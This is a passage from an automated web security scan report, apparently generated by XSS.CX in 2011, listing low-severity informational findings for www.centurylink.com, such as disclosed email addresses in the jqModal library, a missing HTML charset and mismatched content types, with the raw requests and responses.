The following email address was disclosed in the response:

Request

GET /assets/css/plugins/jqModal.css HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:16 GMT
Server: Apache
Last-Modified: Sun, 24 Jul 2011 21:13:15 GMT
ETag: "c36bc-43f-4a8d72ab850c0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 1087
Content-Type: text/css

/* jqModal base Styling courtesy of;
   Brice Burgess <bhb@iceburg.net> */

/* The Window's CSS z-index value is respected (takes priority). If none is supplied,
   the Window's z-index value will be set
...[SNIP]...

6.3. http://www.centurylink.com/assets/js/plugins/jqModal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /assets/js/plugins/jqModal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/js/plugins/jqModal.js HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315319297|session#1315319236191-142486#1315321097

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:22 GMT
Server: Apache
Last-Modified: Tue, 07 Jun 2011 22:02:29 GMT
ETag: "c3480-d1b-4a52660402740"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:22 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3355
Content-Type: application/javascript

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqModal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...

7. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET / HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:15 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 69165
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>CenturyLink | Local Provider of High Speed Internet, Phone, Mobile & TV Services</titl
...[SNIP]...

8. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


8.1. http://www.centurylink.com/assets/images/banners/165x238_bmg_dd.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.centurylink.com
Path:   /assets/images/banners/165x238_bmg_dd.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /assets/images/banners/165x238_bmg_dd.png HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315319297|session#1315319236191-142486#1315321097

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:20 GMT
Server: Apache
Last-Modified: Mon, 27 Jun 2011 19:11:15 GMT
ETag: "c3408-347c-4a6b650b2dac0"
Accept-Ranges: bytes
Content-Length: 13436
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:20 GMT
Content-Type: image/png

......JFIF.....`.`.....C...........    ...    .......

.

........................... ...C.............. ..........................................
...[SNIP]...

8.2. http://www.centurylink.com/assets/js/third-party/metrics/metrixConfig.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.centurylink.com
Path:   /assets/js/third-party/metrics/metrixConfig.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /assets/js/third-party/metrics/metrixConfig.js?_=1315319240626 HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315319297|session#1315319236191-142486#1315321097|PC#1315319236191-142486.19#1316528840

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:22 GMT
Server: Apache
Last-Modified: Sun, 31 Jul 2011 00:10:55 GMT
ETag: "c369d-1aad-4a952592741c0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:22 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 6829
Content-Type: application/javascript

/*** Omniture SiteCatalyst Unique PageName Tagging ***/

for(i=0;i<document.forms.length;i++){
if(location.pathname=="/Pages/Personal/Television/index.html"){if(typeof(pageNameExt)=='undefined'&&!docu
...[SNIP]...

Report generated by XSS.CX at Tue Sep 06 09:05:02 GMT-06:00 2011.